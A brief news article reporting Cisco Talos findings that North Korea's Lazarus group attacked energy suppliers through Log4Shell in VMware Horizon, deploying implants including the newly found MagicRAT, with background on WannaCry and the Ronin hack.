Power suppliers from around the world, including the United States, Canada and Japan, have reportedly been the target of the state-sponsored North Korean hacker group Lazarus, also known as APT38.
According Cisco Talos Intelligence Group (opens in a new tab)the campaign aims to infiltrate organizations worldwide with the aim of establishing long-term access followed by exfiltration of data of interest to the nation state.
While the exact targets remained unnamed, the attacks once again demonstrate the threat that North Korea and Lazarus can pose through destabilization efforts.
How did the attack work?
According to Talos, this campaign was to exploit vulnerabilities in VMWare Horizon’s virtual desktop product to gain an initial position in target organizations.
After successfully entering target corporate networks, the group deployed custom malware implants including VSingle and YamaBot HTML bots.
In addition to these known malware families, they also claimed to have discovered the use of a previously unknown malware implant called “MagicRAT”.
The first entry in organizations was reportedly made using Log4Shell (CVE-2021-44228), a zero-day vulnerability in Log4j, a popular Java logging framework that involves arbitrary code execution.
Cybersecurity company Tenable previously called Log4Shell “the biggest and most critical vulnerability ever.”
This would not be the first time North Korea has been involved in attacks against foreign powers; Kaspersky Lab security analysts linked North Korea to the Wannacry ransomware attack, which blocked 300,000 computers in 150 countries and caused unprecedented problems in the British healthcare system.
Since its founding in 2010, the Lazarus group is sure to be busy, if nothing else. Recently, he has been paying attention to the world of blockchains and DeFi.
Lazarus was linked to the $ 615 million Ronin sidechain attack that powers the popular blockchain-integrated Axie Infinity, which is known to be one of the biggest DefI hacks to date.
- Are you afraid of hackers infiltrating your organization? Check out our guide to the best endpoint protection.